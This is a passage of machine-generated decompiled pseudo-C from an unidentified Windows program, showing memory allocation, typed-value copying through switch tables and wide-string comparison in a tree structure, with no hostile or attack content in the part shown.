                                  																					}
                                  																				}
                                  																				L188:
                                  																				_push(_t1771);
                                  																				 *(_t1771 + 8) = 1;
                                  																				 *_t1771 = 0;
                                  																				E004111DC();
                                  																				_t1396 = _a4;
                                  																				_t1809 = _t1809 + 4;
                                  																				goto L189;
                                  																			}
                                  																		}
                                  																	}
                                  																} else {
                                  																	_t1160 =  *(_t1403 + 0xc);
                                  																	__eflags = _t1160;
                                  																	if(_t1160 != 0) {
                                  																		E004431AD(_t1160);
                                  																		 *(_t1403 + 0xc) = 0;
                                  																	}
                                  																	_t1162 =  *(_t1403 + 8);
                                  																	__eflags = _t1162 - 8;
                                  																	if(_t1162 == 8) {
                                  																		_t1485 =  *_t1403;
                                  																		__eflags = _t1485;
                                  																		if(_t1485 == 0) {
                                  																			goto L158;
                                  																		}
                                  																		__imp__#9(_t1485);
                                  																		_push( *_t1403);
                                  																		E004111DC();
                                  																		_t1809 = _t1809 + 4;
                                  																		goto L162;
                                  																	} else {
                                  																		L158:
                                  																		__eflags = _t1162 - 0xa;
                                  																		if(_t1162 == 0xa) {
                                  																			_t1163 =  *_t1403;
                                  																			__eflags = _t1163;
                                  																			if(_t1163 != 0) {
                                  																				E0044318E(_t1163);
                                  																			}
                                  																		} else {
                                  																			__eflags = _t1162 - 5;
                                  																			if(_t1162 == 5) {
                                  																				E0040E270(_t1403, _t1777);
                                  																			} else {
                                  																				__eflags = _t1162 - 0xb;
                                  																				if(_t1162 == 0xb) {
                                  																					_push( *((intOrPtr*)( *_t1403 + 4)));
                                  																					E004111DC();
                                  																					_push( *_t1403);
                                  																					E004111DC();
                                  																					_t1809 = _t1809 + 8;
                                  																				} else {
                                  																					__eflags = _t1162 - 0xc;
                                  																					if(_t1162 == 0xc) {
                                  																						_t1173 =  *_t1403;
                                  																						__eflags = _t1173;
                                  																						if(_t1173 != 0) {
                                  																							E0044B3D9(_t1173);
                                  																						}
                                  																					}
                                  																				}
                                  																			}
                                  																		}
                                  																		L162:
                                  																		 *(_t1403 + 8) = 1;
                                  																		 *_t1403 = 0;
                                  																		_t1164 =  *(_t1777 + 8);
                                  																		 *(_t1403 + 8) = _t1164;
                                  																		__eflags = _t1164 - 4;
                                  																		if(__eflags != 0) {
                                  																			_t1165 = _t1164 - 1;
                                  																			__eflags = _t1165 - 0xb;
                                  																			if(__eflags > 0) {
                                  																				goto L166;
                                  																			}
                                  																			switch( *((intOrPtr*)(_t1165 * 4 +  &M0042AEDE))) {
                                  																				case 0:
                                  																					__eax =  *__esi;
                                  																					 *__ebx = __eax;
                                  																					goto L166;
                                  																				case 1:
                                  																					 *_t1403 =  *_t1777;
                                  																					 *((intOrPtr*)(_t1403 + 4)) =  *((intOrPtr*)(_t1777 + 4));
                                  																					goto L166;
                                  																				case 2:
                                  																					__fp0 =  *__esi;
                                  																					 *__ebx =  *__esi;
                                  																					goto L166;
                                  																				case 3:
                                  																					goto L163;
                                  																				case 4:
                                  																					_push(0x214);
                                  																					__eax = E004115D7(__edi, __esi, __eflags);
                                  																					__esp = __esp + 4;
                                  																					__eflags = __eax;
                                  																					if(__eax == 0) {
                                  																						__eax = 0;
                                  																						__eflags = 0;
                                  																					} else {
                                  																						__esi =  *__esi;
                                  																						__ecx = 0x85;
                                  																						__edi = __eax;
                                  																						__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  																						__esi + __ecx = __esi + __ecx + __ecx;
                                  																						__ecx = 0;
                                  																					}
                                  																					 *__ebx = __eax;
                                  																					__eflags =  *(__eax + 4);
                                  																					if( *(__eax + 4) != 0) {
                                  																						__eax =  *(__eax + 4);
                                  																						 *__eax =  *__eax + 1;
                                  																						__eflags =  *__eax;
                                  																					}
                                  																					goto L495;
                                  																				case 5:
                                  																					__ecx =  *__esi;
                                  																					 *__ebx = __ecx;
                                  																					goto L166;
                                  																				case 6:
                                  																					__eflags =  *__esi;
                                  																					if(__eflags == 0) {
                                  																						L495:
                                  																						__edi = _a4;
                                  																						goto L166;
                                  																					}
                                  																					_push(0x10);
                                  																					__eax = E004115D7(__edi, __esi, __eflags);
                                  																					__esp = __esp + 4;
                                  																					_push(__eax);
                                  																					 *__ebx = __eax;
                                  																					__imp__#8();
                                  																					__edx =  *__esi;
                                  																					__eax =  *__ebx;
                                  																					_push( *__esi);
                                  																					_push(__eax);
                                  																					__imp__#10();
                                  																					__eflags = __eax;
                                  																					if(__eax < 0) {
                                  																						__ecx =  *__ebx;
                                  																						_push( *__ebx);
                                  																						__imp__#9();
                                  																						__edx =  *__ebx;
                                  																						_push( *__ebx);
                                  																						__eax = E004111DC();
                                  																						__esp = __esp + 4;
                                  																						 *__ebx = 0;
                                  																					}
                                  																					goto L166;
                                  																				case 7:
                                  																					 *__ebx =  *__esi;
                                  																					goto L166;
                                  																				case 8:
                                  																					_push(0x18);
                                  																					__eax = E004115D7(__edi, __esi, __eflags);
                                  																					__esp = __esp + 4;
                                  																					__eflags = __eax;
                                  																					if(__eax == 0) {
                                  																						goto L502;
                                  																					}
                                  																					__ecx =  *__esi;
                                  																					__eax = E0044B8A3(__eax,  *__esi);
                                  																					 *__ebx = __eax;
                                  																					goto L166;
                                  																				case 9:
                                  																					_push(8);
                                  																					__eax = E004115D7(__edi, __esi, __eflags);
                                  																					 *__ebx = __eax;
                                  																					__edx =  *__esi;
                                  																					__ecx =  *( *__esi);
                                  																					 *__eax =  *( *__esi);
                                  																					__edx =  *__ebx;
                                  																					__eax =  *( *__ebx);
                                  																					__esp = __esp + 4;
                                  																					__eflags = __eax;
                                  																					if(__eflags == 0) {
                                  																						_push(1);
                                  																						__eax = E004115D7(__edi, __esi, __eflags);
                                  																						__ecx =  *__ebx;
                                  																						 *(__ecx + 4) = __eax;
                                  																						__edx =  *__ebx;
                                  																						__eax =  *( *__ebx + 4);
                                  																						__esp = __esp + 4;
                                  																						 *__eax = 0;
                                  																					} else {
                                  																						_push(__eax);
                                  																						__eax = E004115D7(__edi, __esi, __eflags);
                                  																						__ecx =  *__ebx;
                                  																						 *( *__ebx + 4) = __eax;
                                  																						__ebx =  *__ebx;
                                  																						__edx =  *__ebx;
                                  																						__eax =  *__esi;
                                  																						__ecx =  *( *__esi + 4);
                                  																						__esp = __esp + 4;
                                  																						__edx = __ebx[1];
                                  																						__eax = E00410E60(__ebx[1],  *( *__esi + 4),  *__ebx);
                                  																					}
                                  																					goto L166;
                                  																				case 0xa:
                                  																					_push(0x14);
                                  																					__eax = E004115D7(__edi, __esi, __eflags);
                                  																					__esp = __esp + 4;
                                  																					__eflags = __eax;
                                  																					if(__eax == 0) {
                                  																						L502:
                                  																						__eax = 0;
                                  																						 *__ebx = 0;
                                  																						goto L166;
                                  																					}
                                  																					__ecx =  *__esi;
                                  																					__eax = E00470870(__eax,  *__esi);
                                  																					 *__ebx = __eax;
                                  																					goto L166;
                                  																			}
                                  																		}
                                  																		L163:
                                  																		_push(0x10);
                                  																		_t1166 = E004115D7(_t1733, _t1777, __eflags);
                                  																		_t1809 = _t1809 + 4;
                                  																		__eflags = _t1166;
                                  																		if(_t1166 == 0) {
                                  																			_t1166 = 0;
                                  																		} else {
                                  																			_t1487 =  *(_t1777 + 0xc);
                                  																			 *_t1166 =  *_t1487;
                                  																			 *((intOrPtr*)(_t1166 + 4)) =  *((intOrPtr*)(_t1487 + 4));
                                  																			 *((intOrPtr*)(_t1166 + 8)) =  *((intOrPtr*)(_t1487 + 8));
                                  																			_t1488 =  *(_t1487 + 0xc);
                                  																			 *(_t1166 + 0xc) = _t1488;
                                  																			 *_t1488 =  *_t1488 + 1;
                                  																			__eflags =  *_t1488;
                                  																		}
                                  																		 *(_t1403 + 0xc) = _t1166;
                                  																		goto L166;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													} else {
                                  														_v108 = 1;
                                  														goto L70;
                                  														L71:
                                  														__eflags = _v108 - _v116;
                                  														if(_v108 > _v116) {
                                  															E0040D530( &_v40, _t1493);
                                  															_v104 = 0;
                                  															_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4));
                                  															_t1495 =  *( *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4)) + 8) & 0x0000ffff;
                                  															__eflags = _t1495 - 0x4a;
                                  															if(_t1495 == 0x4a) {
                                  																L381:
                                  																E00402780(_t1179, _t1495,  &_v40);
                                  																_t1495 =  *(_v148 + 4);
                                  																_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 0xc + _v212 * 4));
                                  																L382:
                                  																E00402780(_t1179, _t1495,  &_v40);
                                  																E00402710(0x7f,  &_v20, _t1851);
                                  																E00402780( &_v20, _t1495,  &_v40);
                                  																E0040A780(_a4, _t1851,  &_v40,  &_v104,  &_v196, 0xffffffff);
                                  																_v172 = _v228 + _v228 + _v228 + _v228;
                                  																E00401980(1, _v224 | 0x00000200,  &_v212,  *((intOrPtr*)( *((intOrPtr*)(_v228 + _v228 + _v228 + _v228 +  *((intOrPtr*)(_v164 + 4)))))));
                                  																L140:
                                  																_t1193 =  *(_v148 + 4);
                                  																_t1611 =  *(_v156 + _t1193 + 4);
                                  																__eflags =  *(_t1611 + 8) - 0x41;
                                  																if( *(_t1611 + 8) == 0x41) {
                                  																	_t1611 =  *(_t1193 + 8 + _v212 * 4);
                                  																	_t1194 =  *(_t1611 + 8) & 0x0000ffff;
                                  																	__eflags = _t1194 - 0x4a;
                                  																	if(_t1194 == 0x4a) {
                                  																		L459:
                                  																		_v212 = _v212 + 5;
                                  																		goto L142;
                                  																	}
                                  																	__eflags = _t1194 - 0x49;
                                  																	if(_t1194 == 0x49) {
                                  																		goto L459;
                                  																	}
                                  																	_v212 = _v212 + 4;
                                  																	goto L142;
                                  																} else {
                                  																	_t279 =  &_v212;
                                  																	 *_t279 = _v212 + 2;
                                  																	__eflags =  *_t279;
                                  																	L142:
                                  																	_t1195 = _v12;
                                  																	_v200 = _v200 + 1;
                                  																	__eflags = _t1195 - 0x30;
                                  																	if(_t1195 >= 0x30) {
                                  																		__eflags = _t1195 - 0x3f;
                                  																		if(_t1195 <= 0x3f) {
                                  																			_t1202 = _v20;
                                  																			__eflags = _t1202;
                                  																			if(_t1202 != 0) {
                                  																				E004431AD(_t1202);
                                  																			}
                                  																		}
                                  																	}
                                  																	__eflags = _v32;
                                  																	_v40 = 0x485a84;
                                  																	if(_v32 > 0) {
                                  																		_t1782 = 0;
                                  																		__eflags = 0;
                                  																		do {
                                  																			_t1197 =  *(_v36 + _t1782 * 4);
                                  																			__eflags = _t1197;
                                  																			if(_t1197 != 0) {
                                  																				E0044C7C0(_t1197);
                                  																			}
                                  																			_t1782 = _t1782 + 1;
                                  																			__eflags = _t1782 - _v32;
                                  																		} while (_t1782 < _v32);
                                  																		goto L144;
                                  																	} else {
                                  																		L144:
                                  																		_push(_v36);
                                  																		_v32 = 0;
                                  																		E004111DC();
                                  																		_t1200 = _v108 + 1;
                                  																		_t1809 = _t1809 + 4;
                                  																		_v108 = _t1200;
                                  																		__eflags = _t1200 - _v136;
                                  																		if(_t1200 <= _v136) {
                                  																			L70:
                                  																			_t1493 =  *(_v148 + 4);
                                  																			_t1778 = _v212;
                                  																			_v12 = _t1611 | 0xffffffff;
                                  																			_v40 = 0x485a84;
                                  																			_v36 = 0;
                                  																			_v32 = 0;
                                  																			_v28 = 0;
                                  																			_v104 = 0;
                                  																			_t1738 =  *(_t1493 + _t1778 * 4);
                                  																			_t1652 = _t1493 + _t1778 * 4;
                                  																			_t1177 = 0;
                                  																			_v10 = 0;
                                  																			_v208 = 0;
                                  																			__eflags =  *(_t1738 + 8);
                                  																			if( *(_t1738 + 8) == 0) {
                                  																				do {
                                  																					goto L371;
                                  																					L375:
                                  																					_t1741 =  *_t1652;
                                  																					__eflags =  *(_t1741 + 8);
                                  																				} while ( *(_t1741 + 8) == 0);
                                  																				_v212 = _t1778;
                                  																			}
                                  																			goto L71;
                                  																		} else {
                                  																			_t1393 = _v24;
                                  																			goto L146;
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  															__eflags = _t1495 - 0x49;
                                  															if(_t1495 != 0x49) {
                                  																goto L382;
                                  															}
                                  															goto L381;
                                  														}
                                  														_t1746 = _v128;
                                  														_t1660 = _v200;
                                  														_t1204 = _t1177 | 0x00000200;
                                  														__eflags =  *( *(_t1746 + _t1660 * 4));
                                  														if( *( *(_t1746 + _t1660 * 4)) != 0) {
                                  															_t1728 = _v176;
                                  															_t1611 =  *(_v176 + _t1660 * 4);
                                  															_t1207 = E0045F508( *( *(_t1493 + _t1778 * 4)), E00432508(_t1611), _t1204, 1);
                                  															__eflags = _t1207;
                                  															if(_t1207 == 0) {
                                  																E0045E737(_t1851, _a4, 0x79,  *((short*)( *((intOrPtr*)( *(_v148 + 4) + _t1778 * 4)) + 0xa)));
                                  																E0044B469(__eflags,  &_v32);
                                  																E0040EDC0( &_v56, _t1728, _t1778);
                                  																goto L625;
                                  															}
                                  															_v212 = _t1778 + 2;
                                  															goto L142;
                                  														}
                                  														_t1664 =  *((intOrPtr*)(_v176 + _v200 * 4));
                                  														_t1785 = _t1204;
                                  														_t1215 = _v212 + _v212 + _v212 + _v212;
                                  														_v156 = _t1215;
                                  														_t1748 =  *( *(_t1215 + _t1493));
                                  														__eflags =  *0x4a7f34; // 0x0
                                  														if(__eflags == 0) {
                                  															E00403E10(_t1748, _t1493, _t1664, 0x4a7f24, _t1785, __eflags, _t1664, _t1785);
                                  															goto L140;
                                  														}
                                  														_v204 = _t1664;
                                  														__eflags =  *0x4a7f3d; // 0x0
                                  														if(__eflags != 0) {
                                  															_t1507 =  *0x4a7f38; // 0x0
                                  															_t1406 =  *(_t1507 + 8);
                                  														} else {
                                  															_t1406 =  *0x4a7f38; // 0x0
                                  														}
                                  														_t1219 = 0;
                                  														_v208 = _t1406;
                                  														__eflags =  *_t1406;
                                  														if(__eflags == 0) {
                                  															L94:
                                  															_t1786 = _t1785 & 0x0000ff00;
                                  															_push(0x20);
                                  															_v160 = _t1785 & 0x0000ff00;
                                  															_t1220 = E004115D7(_t1748, _t1785 & 0x0000ff00, __eflags);
                                  															_t1826 = _t1809 + 4;
                                  															__eflags = _t1220;
                                  															if(__eflags == 0) {
                                  																_t1407 = 0;
                                  															} else {
                                  																_t1786 = _t1220;
                                  																 *(_t1786 + 8) = 8;
                                  																 *(_t1786 + 4) = 0;
                                  																_push( ~(0 | __eflags > 0x00000000) | 0x10);
                                  																_t1265 = E004115D7(_t1748, _t1786, __eflags);
                                  																 *_t1786 = _t1265;
                                  																_push(4);
                                  																 *_t1265 = 0;
                                  																_t1266 = E004115D7(_t1748, _t1786, __eflags);
                                  																_t1826 = _t1826 + 8;
                                  																__eflags = _t1266;
                                  																if(_t1266 == 0) {
                                  																	_t1266 = 0;
                                  																} else {
                                  																	 *_t1266 = 1;
                                  																}
                                  																 *(_t1786 + 0xc) = _t1266;
                                  																_t1407 = _t1786;
                                  															}
                                  															__eflags = _t1407 - _t1748;
                                  															if(__eflags != 0) {
                                  																_t1252 =  *(_t1407 + 0xc);
                                  																__eflags =  *_t1252 - 1;
                                  																if(__eflags > 0) {
                                  																	 *_t1252 =  *_t1252 - 1;
                                  																	 *(_t1407 + 4) = _t1748[1];
                                  																	 *(_t1407 + 8) = _t1748[2];
                                  																	 *_t1407 =  *_t1748;
                                  																	_t1748 = _t1748[3];
                                  																	 *(_t1407 + 0xc) = _t1748;
                                  																	 *_t1748 =  *_t1748 + 1;
                                  																} else {
                                  																	_t1786 = _t1748[1];
                                  																	_t222 = _t1786 + 1; // 0x1
                                  																	_t1254 = _t222;
                                  																	 *(_t1407 + 4) = _t1786;
                                  																	__eflags =  *(_t1407 + 8) - _t1254;
                                  																	if( *(_t1407 + 8) < _t1254) {
                                  																		 *(_t1407 + 8) = E00446618(_t1254);
                                  																		_t1256 =  *_t1407;
                                  																		__eflags = _t1256;
                                  																		if(__eflags != 0) {
                                  																			_push(_t1256);
                                  																			E004111DC();
                                  																			_t1826 = _t1826 + 4;
                                  																		}
                                  																		_push( ~(0 | __eflags > 0x00000000) |  *(_t1407 + 8) * 0x00000002);
                                  																		_t1259 = E004115D7(_t1748, _t1786, __eflags);
                                  																		_t1826 = _t1826 + 4;
                                  																		 *_t1407 = _t1259;
                                  																		 *((short*)(_t1259 + _t1786 * 2)) = 0;
                                  																	}
                                  																	E00410E60( *_t1407,  *_t1748,  *(_t1407 + 4) +  *(_t1407 + 4) + 2);
                                  																	_t1826 = _t1826 + 0xc;
                                  																}
                                  															}
                                  															_push(0x10);
                                  															 *((intOrPtr*)(_t1407 + 0x10)) = _v160;
                                  															_t1222 = E004115D7(_t1748, _t1786, __eflags);
                                  															_t1508 = 0;
                                  															_t1809 = _t1826 + 4;
                                  															__eflags = _t1222;
                                  															if(_t1222 == 0) {
                                  																L109:
                                  																_t1223 = _v208;
                                  																_t1750 = 0;
                                  																 *((intOrPtr*)(_t1407 + 0x14)) = _t1508;
                                  																 *(_t1407 + 0x1c) = 0;
                                  																 *(_t1407 + 0x18) = 0;
                                  																_t1787 =  *_t1223;
                                  																__eflags = _t1787;
                                  																if(_t1787 == 0) {
                                  																	 *(_t1407 + 0x1c) = 0;
                                  																	 *(_t1407 + 0x18) = 0;
                                  																	L139:
                                  																	 *_t1223 = _t1407;
                                  																	goto L140;
                                  																}
                                  																__eflags =  *0x4a95e4 & 0x00000001;
                                  																if(__eflags == 0) {
                                  																	 *0x4a95e4 =  *0x4a95e4 | 0x00000001;
                                  																	E0044A801(0x4a95c4);
                                  																	E0041130A(__eflags, 0x425c12);
                                  																	_t1809 = _t1809 + 4;
                                  																}
                                  																 *0x4a95e0 = _t1750;
                                  																 *0x4a95dc = _t1750;
                                  																_v112 = 0x4a95c4;
                                  																_v140 = 0x4a95c4;
                                  																while(1) {
                                  																	_t1227 =  *(_t1407 + 4);
                                  																	_t1665 =  *((intOrPtr*)(_t1787 + 4));
                                  																	__eflags = _t1227 - _t1750;
                                  																	if(_t1227 == _t1750) {
                                  																		goto L431;
                                  																	}
                                  																	L113:
                                  																	__eflags = _t1665 - _t1750;
                                  																	if(_t1665 == _t1750) {
                                  																		L432:
                                  																		__eflags = _t1227 - _t1750;
                                  																		if(_t1227 != _t1750) {
                                  																			L124:
                                  																			_t257 = _t1787 + 0x1c; // 0x1c
                                  																			_t1241 = _t257;
                                  																			_v204 = _t1241;
                                  																			_t1242 =  *_t1241;
                                  																			__eflags = _t1242 - _t1750;
                                  																			if(_t1242 != _t1750) {
                                  																				_v160 = _t1242;
                                  																				_t1243 = E004431CB(_t1242, _t1407);
                                  																				_t1809 = _t1809 + 8;
                                  																				__eflags = _t1243;
                                  																				if(_t1243 == 0) {
                                  																					L446:
                                  																					 *(_v140 + 0x1c) = _t1787;
                                  																					_v140 = _t1787;
                                  																					_t1787 =  *_v204;
                                  																					while(1) {
                                  																						_t1227 =  *(_t1407 + 4);
                                  																						_t1665 =  *((intOrPtr*)(_t1787 + 4));
                                  																						__eflags = _t1227 - _t1750;
                                  																						if(_t1227 == _t1750) {
                                  																							goto L431;
                                  																						}
                                  																						goto L113;
                                  																					}
                                  																				}
                                  																				_t1245 = _v160;
                                  																				 *_v204 =  *(_t1245 + 0x18);
                                  																				 *(_t1245 + 0x18) = _t1787;
                                  																				_t1787 = _t1245;
                                  																				__eflags =  *(_t1245 + 0x1c) - _t1750;
                                  																				if( *(_t1245 + 0x1c) == _t1750) {
                                  																					goto L125;
                                  																				}
                                  																				_t1246 = _t1245 + 0x1c;
                                  																				__eflags = _t1246;
                                  																				_v204 = _t1246;
                                  																				goto L446;
                                  																			}
                                  																			L125:
                                  																			 *(_v140 + 0x1c) =  *(_t1787 + 0x18);
                                  																			 *(_v112 + 0x18) =  *(_t1787 + 0x1c);
                                  																			_t1231 =  *0x4a95e0; // 0x0
                                  																			_t1668 =  *((intOrPtr*)(_t1787 + 4));
                                  																			 *(_t1787 + 0x18) = _t1231;
                                  																			_t1510 =  *0x4a95dc; // 0xa51b60
                                  																			 *(_t1787 + 0x1c) = _t1510;
                                  																			_t1232 =  *(_t1407 + 4);
                                  																			__eflags = _t1232 - _t1750;
                                  																			if(_t1232 == _t1750) {
                                  																				__eflags = _t1668 - _t1750;
                                  																				if(_t1668 != _t1750) {
                                  																					L454:
                                  																					 *(_t1407 + 0x18) =  *(_t1787 + 0x18);
                                  																					 *(_t1407 + 0x1c) = _t1787;
                                  																					 *(_t1787 + 0x18) = _t1750;
                                  																					L138:
                                  																					_t1223 = _v208;
                                  																					goto L139;
                                  																				}
                                  																				L448:
                                  																				__eflags = _t1232 - _t1750;
                                  																				if(_t1232 != _t1750) {
                                  																					L137:
                                  																					_t1511 =  *0x4a95dc; // 0xa51b60
                                  																					 *(_t1407 + 0x1c) = _t1511;
                                  																					 *(_t1407 + 0x18) = _t1787;
                                  																					 *(_t1787 + 0x1c) = _t1750;
                                  																					goto L138;
                                  																				}
                                  																				L127:
                                  																				__eflags = _t1232 - _t1668;
                                  																				if(_t1232 < _t1668) {
                                  																					_t1235 = E0040D260( *_t1407,  *_t1787, _t1668);
                                  																					L135:
                                  																					__eflags = _t1235 - _t1750;
                                  																					if(__eflags < 0) {
                                  																						goto L454;
                                  																					}
                                  																					if(__eflags <= 0) {
                                  																						_t1407 = _t1787;
                                  																						goto L138;
                                  																					}
                                  																					goto L137;
                                  																				}
                                  																				__eflags = _t1232 - _t1750;
                                  																				if(_t1232 <= _t1750) {
                                  																					L451:
                                  																					_t1235 = 0;
                                  																				} else {
                                  																					_t1513 =  *_t1787;
                                  																					_t1669 = _t1232;
                                  																					_t1236 =  *_t1407;
                                  																					while(1) {
                                  																						__eflags =  *_t1236 -  *_t1513;
                                  																						if(__eflags != 0) {
                                  																							if(__eflags < 0) {
                                  																								_t1235 = _t1236 | 0xffffffff;
                                  																								_t1750 = 0;
                                  																							} else {
                                  																								_t1235 = 1;
                                  																								_t1750 = 0;
                                  																								__eflags = 0;
                                  																							}
                                  																							goto L135;
                                  																						}
                                  																						_t1236 = _t1236 + 2;
                                  																						_t1513 = _t1513 + 2;
                                  																						_t1669 = _t1669 - 1;
                                  																						__eflags = _t1669;
                                  																						if(_t1669 != 0) {
                                  																							continue;
                                  																						} else {
                                  																							_t1750 = 0;
                                  																							__eflags = 0;
                                  																							goto L451;
                                  																						}
                                  																					}
                                  																				}
                                  																				goto L135;
                                  																			}
                                  																			__eflags = _t1668 - _t1750;
                                  																			if(_t1668 == _t1750) {
                                  																				goto L448;
                                  																			}
                                  																			goto L127;
                                  																		}
                                  																	}
                                  																	__eflags = _t1227 - _t1665;
                                  																	if(_t1227 < _t1665) {
                                  																		_t1248 = E0040D260( *_t1407,  *_t1787, _t1665);
                                  																		L122:
                                  																		__eflags = _t1248 - _t1750;
                                  																		if(__eflags < 0) {
                                  																			L438:
                                  																			_t762 = _t1787 + 0x18; // 0x18
                                  																			_t1228 = _t762;
                                  																			_v204 = _t1228;
                                  																			_t1229 =  *_t1228;
                                  																			__eflags = _t1229 - _t1750;
                                  																			if(_t1229 == _t1750) {
                                  																				goto L125;
                                  																			}
                                  																			_v160 = _t1229;
                                  																			_t1237 = E004431CB(_t1407, _t1229);
                                  																			_t1809 = _t1809 + 8;
                                  																			__eflags = _t1237;
                                  																			if(_t1237 == 0) {
                                  																				L442:
                                  																				 *(_v112 + 0x18) = _t1787;
                                  																				_v112 = _t1787;
                                  																				_t1787 =  *_v204;
                                  																				_t1227 =  *(_t1407 + 4);
                                  																				_t1665 =  *((intOrPtr*)(_t1787 + 4));
                                  																				__eflags = _t1227 - _t1750;
                                  																				if(_t1227 == _t1750) {
                                  																					goto L431;
                                  																				}
                                  																				goto L113;
                                  																			}
                                  																			_t1239 = _v160;
                                  																			 *_v204 =  *(_t1239 + 0x1c);
                                  																			 *(_t1239 + 0x1c) = _t1787;
                                  																			_t1787 = _t1239;
                                  																			__eflags =  *(_t1239 + 0x18) - _t1750;
                                  																			if( *(_t1239 + 0x18) == _t1750) {
                                  																				goto L125;
                                  																			}
                                  																			_t1240 = _t1239 + 0x18;
                                  																			__eflags = _t1240;
                                  																			_v204 = _t1240;
                                  																			goto L442;
                                  																		}
                                  																		if(__eflags <= 0) {
                                  																			goto L125;
                                  																		}
                                  																		goto L124;
                                  																	}
                                  																	__eflags = _t1227 - _t1750;
                                  																	if(_t1227 <= _t1750) {
                                  																		L435:
                                  																		_t1248 = 0;
                                  																	} else {
                                  																		_t1519 =  *_t1787;
                                  																		_t1672 = _t1227;
                                  																		_t1249 =  *_t1407;
                                  																		while(1) {
                                  																			__eflags =  *_t1249 -  *_t1519;
                                  																			if(__eflags != 0) {
                                  																				if(__eflags < 0) {
                                  																					_t1248 = _t1249 | 0xffffffff;
                                  																					_t1750 = 0;
                                  																				} else {
                                  																					_t1248 = 1;
                                  																					_t1750 = 0;
                                  																					__eflags = 0;
                                  																				}
                                  																				goto L122;
                                  																			}
                                  																			_t1249 = _t1249 + 2;
                                  																			_t1519 = _t1519 + 2;
                                  																			_t1672 = _t1672 - 1;
                                  																			__eflags = _t1672;
                                  																			if(_t1672 != 0) {
                                  																				continue;
                                  																			} else {
                                  																				_t1750 = 0;
                                  																				__eflags = 0;
                                  																				goto L435;
                                  																			}
                                  																		}
                                  																	}
                                  																	goto L122;
                                  																	L431:
                                  																	__eflags = _t1665 - _t1750;
                                  																	if(_t1665 != _t1750) {
                                  																		goto L438;
                                  																	}
                                  																	goto L432;
                                  																}
                                  															} else {
                                  																_t1753 = _v204;
                                  																_t1673 =  *((intOrPtr*)(_t1753 + 8));
                                  																_t1788 = _t1222;
                                  																_t232 = _t1673 - 1; // 0x46
                                  																_t1250 = _t232;
                                  																_v140 = _t1788;
                                  																 *((intOrPtr*)(_t1788 + 8)) =  *((intOrPtr*)(_t1753 + 8));
                                  																 *(_t1788 + 0xc) = 0;
                                  																__eflags = _t1250 - 0xb;
                                  																if(__eflags > 0) {
                                  																	L108:
                                  																	_t1508 = _v140;
                                  																	goto L109;
                                  																}
                                  																switch( *((intOrPtr*)(_t1250 * 4 +  &M0040A744))) {
                                  																	case 0:
                                  																		__eax =  *__edi;
                                  																		goto L266;
                                  																	case 1:
                                  																		__eax =  *__edi;
                                  																		 *__esi = __eax;
                                  																		__ecx =  *(__edi + 4);
                                  																		 *(__esi + 4) = __ecx;
                                  																		goto L108;
                                  																	case 2:
                                  																		__fp0 =  *__edi;
                                  																		 *__esi = __fp0;
                                  																		goto L108;
                                  																	case 3:
                                  																		_push(0x10);
                                  																		_t1251 = E004115D7(_t1753, _t1788, __eflags);
                                  																		_t1809 = _t1809 + 4;
                                  																		__eflags = _t1251;
                                  																		if(_t1251 == 0) {
                                  																			_t1251 = 0;
                                  																		} else {
                                  																			_t1520 =  *(_t1753 + 0xc);
                                  																			 *_t1251 =  *_t1520;
                                  																			 *((intOrPtr*)(_t1251 + 4)) =  *((intOrPtr*)(_t1520 + 4));
                                  																			 *((intOrPtr*)(_t1251 + 8)) =  *((intOrPtr*)(_t1520 + 8));
                                  																			_t1521 =  *(_t1520 + 0xc);
                                  																			 *(_t1251 + 0xc) = _t1521;
                                  																			 *_t1521 =  *_t1521 + 1;
                                  																			__eflags =  *_t1521;
                                  																		}
                                  																		 *(_t1788 + 0xc) = _t1251;
                                  																		goto L108;
                                  																	case 4:
                                  																		_push(0x214);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			__eax = 0;
                                  																			__eflags = 0;
                                  																		} else {
                                  																			__edx = _v204;
                                  																			__esi =  *__edx;
                                  																			__ecx = 0x85;
                                  																			__edi = __eax;
                                  																			__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  																			__edi = __esi + __ecx;
                                  																			__edi = __esi + __ecx + __ecx;
                                  																			__ecx = 0;
                                  																		}
                                  																		__ecx = _v140;
                                  																		 *__ecx = __eax;
                                  																		__eflags =  *(__eax + 4);
                                  																		if( *(__eax + 4) != 0) {
                                  																			__eax =  *(__eax + 4);
                                  																			 *__eax =  *__eax + 1;
                                  																		}
                                  																		goto L108;
                                  																	case 5:
                                  																		__edx =  *__edi;
                                  																		 *__esi = __edx;
                                  																		goto L108;
                                  																	case 6:
                                  																		__eflags =  *__edi;
                                  																		if(__eflags != 0) {
                                  																			_push(0x10);
                                  																			__eax = E004115D7(__edi, __esi, __eflags);
                                  																			__esp = __esp + 4;
                                  																			_push(__eax);
                                  																			 *__esi = __eax;
                                  																			__imp__#8();
                                  																			__edx =  *__edi;
                                  																			__eax =  *__esi;
                                  																			_push(__edx);
                                  																			_push(__eax);
                                  																			__imp__#10();
                                  																			__eflags = __eax;
                                  																			if(__eax < 0) {
                                  																				__ecx =  *__esi;
                                  																				_push( *__esi);
                                  																				__imp__#9();
                                  																				__edx =  *__esi;
                                  																				_push(__edx);
                                  																				__eax = E004111DC();
                                  																				__esp = __esp + 4;
                                  																				 *__esi = 0;
                                  																			}
                                  																		}
                                  																		goto L108;
                                  																	case 7:
                                  																		 *__esi =  *__edi;
                                  																		goto L108;
                                  																	case 8:
                                  																		_push(0x18);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			goto L429;
                                  																		}
                                  																		__ecx =  *__edi;
                                  																		__eax = E0044B8A3(__eax,  *__edi);
                                  																		goto L266;
                                  																	case 9:
                                  																		_push(8);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		 *__esi = __eax;
                                  																		__edx =  *__edi;
                                  																		__ecx =  *( *__edi);
                                  																		 *__eax =  *( *__edi);
                                  																		__edx =  *__esi;
                                  																		__eax =  *( *__esi);
                                  																		__esp = __esp + 4;
